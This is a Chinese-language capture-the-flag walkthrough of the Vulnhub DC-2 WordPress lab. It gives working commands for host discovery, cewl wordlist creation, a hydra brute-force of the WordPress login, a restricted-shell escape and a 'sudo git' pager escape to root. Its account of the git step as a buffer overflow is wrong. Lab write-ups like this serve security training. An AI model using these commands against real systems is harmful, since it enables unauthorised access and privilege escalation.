当前位置:首页技术教程Vulnhub靶场之DC-2 WordPress
Vulnhub靶场之DC-2 WordPress
°
  • 素材类型: 资源-素材
  • 上传时间:

环境:

kali:192.168.75.129              DC2 -靶机 和 kali 在同一C段

先是arp-scan -l检索局域网内主机

Vulnhub靶场之DC-2 WordPress

发现靶机地址,使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136

Vulnhub靶场之DC-2 WordPress

发现打开了80端口,SSH端口

那么直接访问80看看有没有什么神奇的东西

Vulnhub靶场之DC-2 WordPress

还跳转了,上hosts重定向。

win10路径: C:WindowsSystem32driversetc

linux路径:/etc/hosts 

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

访问成功,发现flag1

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

使用工具 cewl爬取生成密码

cewl http://dc-2/ -w passwd.txt

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

准备使用wpscan进行搞事情,但我。。

Vulnhub靶场之DC-2 WordPress

上hydra大杀器吧,修是不可能修的,,,WordPress默认后台地址:/wp-admin 且WordPress当用户名不存在时会提示用户不存在,可增加爆破效率

hydra -L user.txt  -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Vulnhub靶场之DC-2 WordPress

我们跑出了 jerry和tom账户,登进去看看

tom,没啥东西,jerry用户界面如下,发现了flag2

Vulnhub靶场之DC-2 WordPress

啊哈

Vulnhub靶场之DC-2 WordPress

想到上一个DC1的靶机是用SSH干进去的

问题是,WordPress的CMS本身还是比较安全的,问题基本都出在插件上,可这个jerry的账号权限不够,无法安装插件来上传shell

那就硬着头皮ssh试试看,用登录账号密码试试

Vulnhub靶场之DC-2 WordPress

jerry老贼不是同一个密码,太草(一种植物)蛋了

试试看Tom老贼

Vulnhub靶场之DC-2 WordPress

不愧是你。。。。

Vulnhub靶场之DC-2 WordPress

执行命令发现 command not found,百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加

BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

Vulnhub靶场之DC-2 WordPress

得到flag3

Vulnhub靶场之DC-2 WordPress

切换到Jerry,发现flag4.txt

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

哈?Git还能提权?

试试看吧。看看git有没有那个权限 sudo -l

Vulnhub靶场之DC-2 WordPress

flag不会骗人(小声bb)

sudo git -p help
!/bin/sh

Vulnhub靶场之DC-2 WordPress

奇怪,我怎么没法提权,查了查百度,发现

git有一个缓冲区溢出漏洞,在使用sudo git -p –help时,不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数,使其一次性显示不完这条命令的回显结果,这样这条命令就一直处于运行状态,加上此时处于root权限,我们直接在这时候打开bash shell,直接提权至root。

看起来要打开gui了,来自Xshell的鄙,艹(一种植物)

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

Vulnhub靶场之DC-2 WordPress

奇怪的知识增加了

Vulnhub靶场之DC-2 WordPress

温馨提示:

文章标题:Vulnhub靶场之DC-2 WordPress

文章链接:https://www.xiciw.com/jsjc/2936.html

更新时间:2024年03月31日

本站大部分内容均收集于网络!若内容若侵犯到您的权益,请发送邮件至:xiciw#qq.com我们将第一时间处理!

资源所需价格并非资源售卖价格,是收集、整理、编辑详情以及本站运营的适当补贴,并且本站不提供任何免费技术支持。

                               

所有资源仅限于参考和学习,版权归原作者所有,更多请阅读菜鸟资源服务协议

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
技术教程

绕过WTS-WAF拦截注入

2024-3-30 19:32:46

技术教程

浅析AnyCast网络技术

2024-4-3 23:53:16

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索